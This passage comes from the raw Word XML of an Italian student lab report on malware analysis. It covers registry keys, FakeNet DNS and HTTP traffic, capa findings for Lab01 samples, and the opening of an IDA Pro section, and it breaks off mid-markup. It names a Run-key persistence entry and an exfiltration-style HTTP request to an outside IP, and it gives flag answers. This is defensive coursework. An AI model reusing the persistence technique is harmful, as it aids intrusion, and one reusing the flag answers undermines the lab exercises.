                    <a:blip r:embed="rId190"/>
                    <a:srcRect l="2629" t="3573" r="47144" b="17273"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6272862" cy="5560517"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30DF97" w14:textId="75E7C144" w:rsidR="00B508C0" w:rsidRDefault="00B508C0" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La chiave ricercata è:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E12E192" w14:textId="12CA1FC1" w:rsidR="00AC2497" w:rsidRDefault="00AC2497" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>HKLM\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15649182" w14:textId="77777777" w:rsidR="00AC2497" w:rsidRDefault="00AC2497" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102C83A7" w14:textId="08818141" w:rsidR="00B508C0" w:rsidRDefault="001E3DE4" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B483DAD" wp14:editId="16B69AD1">
            <wp:extent cx="6568450" cy="1701209"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="847690513" name="Immagine 3" descr="Immagine che contiene testo, software, computer, Software multimediale&#10;&#10;Descrizione generata automaticamente">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0513" name="Immagine 3" descr="Immagine che contiene testo, software, computer, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId191"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId192"/>
                    <a:srcRect l="10723" t="13374" r="36166" b="62171"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6617792" cy="1713988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2ED82E" w14:textId="64AA3DC4" w:rsidR="00AC2497" w:rsidRDefault="00F0039E" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il type ricercato è </w:t>
      </w:r>
      <w:r w:rsidR="00AC2497">
        <w:t>REG_SZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69804228" w14:textId="77777777" w:rsidR="00575157" w:rsidRDefault="00575157" w:rsidP="00235FF0">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572F1B78" w14:textId="1D6291CE" w:rsidR="00235FF0" w:rsidRDefault="00235FF0" w:rsidP="00235FF0">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc140165824"/>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="006F705C">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F705C">
        <w:t>Key12</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="4234214A" w14:textId="68921E5D" w:rsidR="00AC2497" w:rsidRDefault="00C77F30" w:rsidP="00C77F30">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48A3D683" wp14:editId="5F69E5D6">
            <wp:extent cx="6253480" cy="4454857"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="813308108" name="Immagine 4" descr="Immagine che contiene testo, schermata, software, numero&#10;&#10;Descrizione generata automaticament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8108" name="Immagine 4" descr="Immagine che contiene testo, schermata, software, numero&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId193"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId194"/>
                    <a:srcRect r="62047" b="51932"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6331749" cy="4510614"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A99890" w14:textId="77777777" w:rsidR="00C77F30" w:rsidRDefault="00C77F30" w:rsidP="00C77F30">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\webkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EDE22E" w14:textId="729107E1" w:rsidR="00A40D68" w:rsidRDefault="00A40D68">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B37C71" w14:textId="33FE64E2" w:rsidR="00A40D68" w:rsidRDefault="00A40D68" w:rsidP="00A40D68">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc140165825"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.11 Traffico DNS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="0538C660" w14:textId="3311A1A0" w:rsidR="00185985" w:rsidRPr="00185985" w:rsidRDefault="00185985" w:rsidP="00185985">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analisi tramite </w:t>
      </w:r>
      <w:r w:rsidR="00222898">
        <w:t>fakenet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E837DA" w14:textId="71FED52F" w:rsidR="00AC2497" w:rsidRDefault="00A40D68" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58456B27" wp14:editId="7CA31B01">
            <wp:extent cx="6560288" cy="3986606"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
            <wp:docPr id="1918995244" name="Immagine 5" descr="Immagine che contiene schermata, testo, Software multimediale, Software per la grafica&#10;&#10;Descrizione generata automaticamente">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5244" name="Immagine 5" descr="Immagine che contiene schermata, testo, Software multimediale, Software per la grafica&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId195"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId196"/>
                    <a:srcRect l="2720" t="4268" r="55684" b="50794"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6612003" cy="4018033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C58399" w14:textId="77777777" w:rsidR="000D0077" w:rsidRDefault="000D0077" w:rsidP="000D0077">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La chiave nel traffico dns è Flag1.samsclass.info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDBFA9" w14:textId="77777777" w:rsidR="005878B2" w:rsidRDefault="005878B2" w:rsidP="000D0077">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26155965" w14:textId="57B86E2A" w:rsidR="00222898" w:rsidRDefault="00222898" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="596730AD" wp14:editId="184FF485">
            <wp:extent cx="6560185" cy="3206105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85806011" name="Immagine 6" descr="Immagine che contiene testo, schermata, software, computer&#10;&#10;Descrizione generata automaticament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011" name="Immagine 6" descr="Immagine che contiene testo, schermata, software, computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId197"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId198"/>
                    <a:srcRect r="36165" b="44537"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6587764" cy="3219584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2768D6EA" w14:textId="77777777" w:rsidR="00222898" w:rsidRDefault="00222898" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F33D49" w14:textId="77777777" w:rsidR="00222898" w:rsidRDefault="00222898" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D114F7" w14:textId="2435AD55" w:rsidR="00AC2497" w:rsidRDefault="00486A37" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il traffico va da 10.211.55.13 a</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">198.199.94.12 </w:t>
      </w:r>
      <w:r w:rsidR="00E73D12">
        <w:t xml:space="preserve">su protocollo http. Il flag ricercato è: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301742E9" w14:textId="76952CC3" w:rsidR="00AC2497" w:rsidRDefault="00E73D12" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET /?flag=exfiltration HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D432681" w14:textId="77777777" w:rsidR="00E73D12" w:rsidRDefault="00E73D12" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5926D5DE" w14:textId="3B34681D" w:rsidR="00E73D12" w:rsidRDefault="00E73D12" w:rsidP="00E73D12">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc140165826"/>
      <w:r>
        <w:t>6.12 Capa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613063D" w14:textId="77777777" w:rsidR="00C23B8F" w:rsidRDefault="00C23B8F" w:rsidP="00E73D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="418B2D11" wp14:editId="4E644F3C">
            <wp:extent cx="5901070" cy="4473360"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="823680434" name="Immagine 8" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticament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0434" name="Immagine 8" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId199"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId200"/>
                    <a:srcRect t="24176" r="49756" b="8110"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5920002" cy="4487711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23825A65" w14:textId="19473239" w:rsidR="00C23B8F" w:rsidRPr="0043321B" w:rsidRDefault="0043321B" w:rsidP="00C23B8F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La capacità da ricercare in </w:t>
      </w:r>
      <w:r w:rsidR="00CD277B">
        <w:t xml:space="preserve">Lab01-01.dll è </w:t>
      </w:r>
      <w:r w:rsidR="00CD277B" w:rsidRPr="00CD277B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>check mutex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77642D32" w14:textId="6CC614A6" w:rsidR="00E73D12" w:rsidRPr="00E73D12" w:rsidRDefault="00E73D12" w:rsidP="00E73D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2538326F" wp14:editId="79407E1F">
            <wp:extent cx="6039293" cy="4786997"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="246392333" name="Immagine 7" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">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2333" name="Immagine 7" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId201"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId202"/>
                    <a:srcRect r="52164" b="32591"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6058441" cy="4802174"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD6F787" w14:textId="77777777" w:rsidR="00AC2497" w:rsidRDefault="00AC2497" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E2BE6C" w14:textId="75414A7E" w:rsidR="00AC2497" w:rsidRDefault="004C1790" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>L’MBC Objective da ricercare in Lab01-01.exe è</w:t>
      </w:r>
      <w:r w:rsidRPr="004C1790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DISCOVERY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB955E1" w14:textId="77777777" w:rsidR="004C1790" w:rsidRDefault="004C1790" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB020E9" w14:textId="637F7B64" w:rsidR="00AC2497" w:rsidRDefault="004C1790" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CADA11E" wp14:editId="3A33567C">
            <wp:extent cx="6251575" cy="5358809"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1548014571" name="Immagine 9" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">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14571" name="Immagine 9" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId203"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId204"/>
                    <a:srcRect t="11377" r="47522" b="8650"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6268366" cy="5373202"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9F812" w14:textId="77777777" w:rsidR="004C1790" w:rsidRDefault="004C1790" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0CCCCE" w14:textId="4A6FEE64" w:rsidR="00AC2497" w:rsidRDefault="00ED73F2" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Nel Lab01-04.exe L’ ATT&amp;CK Tactic</w:t>
      </w:r>
      <w:r w:rsidR="00055634">
        <w:t xml:space="preserve"> da ricercare è </w:t>
      </w:r>
      <w:r w:rsidR="00055634" w:rsidRPr="00F56F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PRIVILEGE</w:t>
      </w:r>
      <w:r w:rsidR="00F56F8E" w:rsidRPr="00F56F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610AD394" w14:textId="7763C023" w:rsidR="002E6651" w:rsidRDefault="002E6651">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A043BDB" w14:textId="4E74B84F" w:rsidR="006C1978" w:rsidRDefault="006C1978" w:rsidP="006C1978">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:ind w:left="720"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc140165827"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidR="00AE48AF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyzing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Windows Malware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="48CEE3B8" w14:textId="4B0FEB7E" w:rsidR="002E6651" w:rsidRDefault="0057599A" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="55" w:name="OLE_LINK2"/>
      <w:r>
        <w:t xml:space="preserve">Nel seguente laboratorio andremo ad analizzare dei malware sviluppati per la piattaforma windows </w:t>
      </w:r>
      <w:r w:rsidR="00012CED">
        <w:t>servendoci del tools ID</w:t>
      </w:r>
      <w:r w:rsidR="001030D4">
        <w:t>A Pro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33402A1E" w14:textId="213D3E52" w:rsidR="001030D4" w:rsidRDefault="00E25638" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00E25638">
        <w:t>IDA Pro è un potente strumento di analisi e reverse engineering per software.</w:t>
      </w:r>
      <w:r w:rsidR="00D538CA" w:rsidRPr="00D538CA">
        <w:t xml:space="preserve"> IDA Pro consente di esaminare il codice binario di un'applicazione, come file eseguibili, librerie dinamiche, firmware e altri formati. Utilizzando un'ampia gamma di tecniche di analisi, come l'analisi statica, la decompilazione e il debug, IDA Pro aiuta a ricostruire la struttura e la logica di un programma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB25B93" w14:textId="77777777" w:rsidR="002668BD" w:rsidRDefault="002668BD" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF66DBE" w14:textId="5FFF514E" w:rsidR="002668BD" w:rsidRDefault="00007A8A" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le immagini in formato originale sono disponibili sul sito </w:t>
      </w:r>
      <w:hyperlink r:id="rId205" w:history="1">
        <w:r w:rsidR="00886104" w:rsidRPr="00886104">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>Git Windows Malware</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkEnd w:id="55"/>
    <w:p w14:paraId="2A2BCA30" w14:textId="77777777" w:rsidR="00D538CA" w:rsidRDefault="00D538CA" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C5C7F1" w14:textId="61B561E8" w:rsidR="008B04AE" w:rsidRDefault="008B04AE" w:rsidP="008B04AE">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc140165828"/>
      <w:r>
        <w:t xml:space="preserve">7.1 </w:t>
      </w:r>
      <w:r w:rsidR="00D16E6C">
        <w:t>Secret Flags</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE74C9A" w14:textId="3B968E44" w:rsidR="00D538CA" w:rsidRDefault="00D16E6C" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19DC8E7D" wp14:editId="67C9D3FF">
            <wp:extent cx="6645910" cy="1978660"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1814673090"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3090" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1978660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F269403" w14:textId="2B992FD5" w:rsidR="00CA7C14" w:rsidRDefault="006B2FFF" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DllMain inizia a 1000D02E </w:t>
      </w:r>
      <w:r w:rsidR="00A15C0B">
        <w:t>ed ha lunghezza DF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2837D" w14:textId="77777777" w:rsidR="00A15C0B" w:rsidRDefault="00A15C0B" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BF4B27" w14:textId="21BA15BB" w:rsidR="00C80885" w:rsidRDefault="00DE1CE5" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE07528" wp14:editId="0D2ABFEA">
